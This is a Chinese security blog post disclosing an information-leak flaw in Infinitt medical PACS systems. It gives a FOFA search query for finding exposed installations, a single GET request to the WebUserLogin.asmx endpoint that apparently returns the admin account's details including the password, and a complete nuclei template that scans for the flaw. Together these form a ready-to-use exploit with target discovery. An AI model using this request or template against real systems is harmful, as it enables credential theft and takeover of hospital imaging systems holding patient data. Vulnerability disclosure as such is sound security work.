英飞达医学WebUserLogin信息泄露漏洞

admin 2024年10月28日14:26:27评论38 views字数 740阅读2分28秒阅读模式

漏洞简介

英飞达影像存档与通讯(PACS)系统存在信息泄露漏洞,攻击者可以通过该漏洞获取管理员信息,进而登录控制整个系统。

英飞达医学WebUserLogin信息泄露漏洞

影响版本

全版本

资产测绘

fofa-query: icon_hash="1474455751" || icon_hash="702238928"

英飞达医学WebUserLogin信息泄露漏洞

漏洞poc

GET /webservices/WebUserLogin.asmx/GetUserInfoByUserID?userID=admin

复现成功:

英飞达医学WebUserLogin信息泄露漏洞

nuclei脚本:

英飞达医学WebUserLogin信息泄露漏洞

英飞达医学WebUserLogin信息泄露漏洞

获取nuclei形式的POC以及fofa语句查询后的资产

id: infinitt-WebUserLogin-info-leak

info:
  name: 英飞达医学WebUserLogin信息泄露漏洞
  author: Simple
  severity: medium
  description: |
    英飞达医学WebUserLogin.asmx接口存在信息泄露漏洞。
  reference:
    - https://github.com/JJThome
  metadata:
    fofa-query: icon_hash="1474455751" || icon_hash="702238928"

http:
  - method: GET
    path:
      - "{{BaseURL}}/webservices/WebUserLogin.asmx/GetUserInfoByUserID?userID=admin"

    matchers:
      - type: dsl
        dsl:
          - contains(body,"<web_user_login>")
          - contains(body,"<PASSWORD>")
          - status_code == 200
        condition: and

原文始发于微信公众号(simple学安全):英飞达医学WebUserLogin信息泄露漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月28日14:26:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   英飞达医学WebUserLogin信息泄露漏洞https://cn-sec.com/archives/3316722.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息